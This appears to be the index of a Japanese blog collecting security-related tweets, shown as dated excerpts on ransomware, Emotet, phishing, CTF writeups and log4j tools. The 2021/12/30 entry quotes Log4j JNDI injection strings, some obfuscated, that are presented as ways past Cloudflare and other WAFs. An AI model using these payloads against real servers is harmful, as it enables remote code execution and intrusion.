セキュリティ関連メモ

2022/11/23 セキュリティ関連Twitterメモ

Open xINT CTF 2022 Writeup https://t.co/qT9ic3d1hf #CTF #OSINT — かみくだく?????????? (@kamikudakun) Oct 29, 2022 【病院にサイバー攻撃か 診療停止】 https://t.co/BHSu7xnRw8 — Yahoo!ニュース (@YahooNewsTopics) Oct 31, 2022 出張の夜、ホテルに…

2022/10/30 セキュリティ関連Twitterメモ

【セキュリティ ニュース】米CISA、レッドチーム演習の可視化ツールを公開 - 意思決定など支援(1ページ目 / 全1ページ):Security NEXT https://t.co/Md49pFzHMT ほえー — にゃん☆たく (@taku888infinity) Oct 17, 2022 今月から新規にECサイト等でクレジ…

2022/10/18 セキュリティ関連Twitterメモ

インシデント対応訓練をおこないましたよー - CloudNative Inc. BLOGs https://t.co/MjfvOsjXLC こゆのありがたいなぁ。このレベルのものを自社で考えたり準備するのは割と難しいかもしれないけど、要所要所で必要なポイントは参考にしてもよいかと。 ? にゃ…

2022/10/5 セキュリティ関連Twitterメモ

ゼロトラストは理念が悪いとは思いませんが、命名は正直失敗だと思ってます。 知らない人が名前だけ聞いたときに想像するものと、本来意味するものとの間にギャップがありすぎる気がします。 — しなもん (@am7cinnamon) Sep 19, 2022 無条件には信頼しない=…

2022/9/19 セキュリティ関連Twitterメモ

セキュリティエンジニアの為の検索エンジン https://t.co/Psm1kHITBe — Bell (@1984_big_bell) Sep 12, 2022 『2022年7月末から、Purple Fox Exploit Kit への誘導が再開されたことを確認しました。』 サポート終了後も狙われ続けるInternet Explorerの脆弱…

2022/9/11 セキュリティ関連Twitterメモ

原神のアンチチートを悪用しアンチウイルス回避。ランサムウェアへの応用事例が確認 - PC Watch https://t.co/DkMDJlsNY1 — 辻 伸弘 (nobuhiro tsuji) (@ntsuji) Aug 26, 2022 https://t.co/LHqNBsmm9O 近畿総合通信局などが主催する「サイバーセキュリティ…

2022/8/27 セキュリティ関連Twitterメモ

MFA(多要素認証)を突破するフィッシング攻撃の調査 https://t.co/9CfxUGWzr3 — piyokango (@piyokango) Aug 15, 2022 サイバー対策に税優遇 政府、防衛企業の機密保護へ新法: 日本経済新聞 https://t.co/Qc8cqLuH0U — piyokango (@piyokango) Aug 18, 2022…

2022/8/15 セキュリティ関連Twitterメモ

Some post-quantum cryptography system broken (Supersingular Isogeny Diffie–Hellman protocol). Attack works in practice, taking "one hour on a single core". That was fast. Highlights the importance of studying those prior to mass deployment…

2022/7/31 セキュリティ関連Twitterメモ

DNS over TLS (DoT) が Windows Insiders にきたぞー https://t.co/Tt88lV9iAV — Yurika (@EurekaBerry) Jul 13, 2022 海外でもこういう認識というか発想はあるんだね(笑) "ペン"テスター https://t.co/ZBgMlhrkcI — keeg_gk_hoge_foo_brabra (@GkKeeg) Jul …

2022/7/14 セキュリティ関連Twitterメモ

ランサムウェアLockBit3.0のアフィリエイト(実際に攻撃して対価を受け取る)になる条件、結構ハードル高い https://t.co/8NHWdyNqPP — 三輪信雄 (@NobMiwa) Jul 4, 2022 一般ユーザに払い出すと危険なサブドメインやメールアドレス - ASnoKaze blog https:/…

2022/7/4 セキュリティ関連Twitterメモ

尼崎市の全市民情報入りUSBを発見 https://t.co/3qUpEGejvO 見つかったんだねー — にゃん☆たく (@taku888infinity) Jun 24, 2022 継続中です。 CISA: Log4Shell exploits still being used to hack VMware servers https://t.co/DbaOO7GCTP — 辻 伸弘 (no…

2022/6/24 セキュリティ関連Twitterメモ

CISA Alert (AA22-158A) 中華人民共和国に支援されたサイバー犯罪者がネットワークプロバイダーやデバイスを悪用している (2022.06.07): まるちゃんの情報セキュリティ気まぐれ日記 https://t.co/JsM147cmfi — piyokango (@piyokango) Jun 12, 2022 業務委託…

2022/6/12 セキュリティ関連Twitterメモ

SECCON Beginners CTF 2022お疲れさまでした 以下作問者Writeupです #ctf4b https://t.co/PvoCkHngyz — うしがぃ (@ushigai_sub) Jun 5, 2022 ご参加いただきありがとうございました! Web問題の作問者writeupです。 SECCON Beginners CTF 2022 作問者writeu…

2022/6/4 セキュリティ関連Twitterメモ

2nd "Offensive Cyber Operations" (hardback out in Europe!) tidbit - We often view offensive cyber as the child of SIGINT agencies, but we can learn so much about military cyber by looking at what it inherited from both SIGINT and Electroni…

2022/5/29 セキュリティ関連Twitterメモ

ホワイト偽装、「プロ」大量採用: 日本経済新聞 https://t.co/YSKHDqjYEI — piyokango (@piyokango) May 16, 2022 HUI Loaderの分析 - JPCERT/CC Eyes https://t.co/b9r226oVOY — piyokango (@piyokango) May 16, 2022 DNSリバインディング(DNS Rebinding)対…

2022/5/15 セキュリティ関連Twitterメモ

Heroku、全ユーザーのパスワードをリセット - OAuthトークンの漏洩受け | TECH+ https://t.co/R47Qdnrbhp — 辻 伸弘 (nobuhiro tsuji) (@ntsuji) May 6, 2022 @0zte9 『ホワイトハッカーの教科書』の感想ツイートありがとうございます???♀? 本書をきっかけと…

2022/5/7 セキュリティ関連Twitterメモ

.lnk型のEmotetのタイムスタンプの箇所についてちょっと遊んでみてたのだけど、通常の右クリックでの作成だとpowershell.exeのタイムスタンプやファイルサイズを持ってくるのだけど(右)、ばら撒かれているやつは情報持ってなさそう(左)なので別途ツール…

2022/4/29 セキュリティ関連Twitterメモ

FortinetのVPN、リストが漏洩したのは去年の11月頃だったでしょうか。一時期リスト中の日本のIPを調べていたのですが、IPの管轄(登録)がISPに帰結するものがほとんどでした。その中に半田病院が混じっていたのかも知れないなと、今になって思います。 http…

2022/4/24 セキュリティ関連Twitterメモ

こわっ・・・ と思う一方、資料がわかりやすく、ユニークに作ってあることに目が行きますねw 本当にあった怖い脆弱性の話 https://t.co/59UZoxbuQw — モグ|セキュリティゼネラリスト (@moneymog) Apr 12, 2022 羽田空港の“顔パス搭乗システム”で情報持ち出…

2022/4/12 セキュリティ関連Twitterメモ

2022年3月の #ランサム リーク確認数 ()は前月数 1??? #Lockbit2 102(78) 2??? #CONTI 65(34) 3??? #BlackCat 20(21) 3??? #Hive 20(9) 5??? #Pandora 4(1) 6??? #Snatch 3(5) 6??? #RansomExx 3(1) 8??? #Ragnar 2(0) 9??? #CL0P 1(11) ???? #Grief 0(0) To…

2022/4/4 セキュリティ関連Twitterメモ

当社が管理するメール中継システムによる外部メール不正中継について | SBテクノロジー (SBT) https://t.co/1NvGf3ElHK — 辻 伸弘 (nobuhiro tsuji) (@ntsuji) Mar 21, 2022 自動車自動運転システムを開発している米国企業を攻撃したと主張しているランサム…

2022/3/22 セキュリティ関連Twitterメモ

とある通販サイトを使ったのだけど、『メールアドレス・パスワードを保存する』というチェックボックスがあったので嫌な予感がした。案の定、ログイン画面でメールアドレスとパスワードがフィルされる。特定のクッキーによって、サーバー側でパスワードがHTM…

2022/3/13 セキュリティ関連Twitterメモ

NVIDIA社員のパスワード数千件がネットに流出、ハッカー集団から奇妙な要求 | TechCrunch Japan https://t.co/AYo5jP70xa — 辻 伸弘 (nobuhiro tsuji) (@ntsuji) Mar 6, 2022 えきねっとのフィッシングサイトを確認しました。ご注意を。 ▼ドメイン ekunta[.]…

2022/3/5 セキュリティ関連Twitterメモ

トレーニングプラットフォーム「BLUE TEAM LABS ONLINE」のご紹介: NECセキュリティブログ | NEC https://t.co/IDTY9cYf3F ログ分析やフォレンジックをゲーム形式で学んでみたい人にとっては良さそう — ほよたか (@takahoyo) Feb 20, 2022 Blinding EDR On W…

2022/2/20 セキュリティ関連Twitterメモ

今週の最初の #Emotet のVT上での結果。 1日経って検出は4割強→7割強。 検出が増える間にメールの情報は盗られてる。 このhashは約10分程度のみの出現で、その先はまた別のhash。 だからEmoCheckのような特化ツールが必要。 サンプルは以下。 https://t.co/F…

2022/2/8 セキュリティ関連Twitterメモ

ルートはメルカリでしたか。しかし、購入した「中古HD」のデータを復元してしまう”善意の”匿名通報者は、どういった方なのかも気になる所です。 「元従業員の売却HDD内に業務文書、データ複製の連鎖で - ラック」 https://t.co/NYBjMVlRgm — キタきつね (@fo…

2022/1/18 セキュリティ関連Twitterメモ

Today, we're open sourcing a log4j JAR scanner. Throw it at a filesystem, detect vulnerable JARs, and even rewrite them in place. Includes a Go API to import the JAR parsing for other applications. https://t.co/TWC4SJFm3p — Eric Chiang (@e…

2021/12/30 セキュリティ関連Twitterメモ

Log4j Cloudflare bypass : ${jndi:dns://aeutbj.example.com/ext} ${jndi:${lower:l}${lower:d}a${lower:p}://example.com/ other WAF : https://t.co/f3Fi7E34TY — H4x0r-DZ (@h4x0r_dz) Dec 11, 2021 Apache Log4j2 2.14.1 RCE (CVE-2021-44228) ??Bypass…

2021/12/12 セキュリティ関連Twitterメモ

I've just published "MAS" Article 1 -- version 1.1. As I'd simplified the original script on page 30, I left (by mistake) two dead lines there (now both removed) The new version (A.1) of the PDF (and next updates) will be published here: h…

2021/12/5 セキュリティ関連Twitterメモ

はてなブログに投稿しました #はてなブログ #FoxonSecurity #セキュリティ 日本人パスワードは「数字」「キーボード配列」「日本人名」に加えて「繰り返し語」 - Fox on Security https://t.co/4SXHOo2HDK — キタきつね (@foxbook) Nov 23, 2021 メールで #P…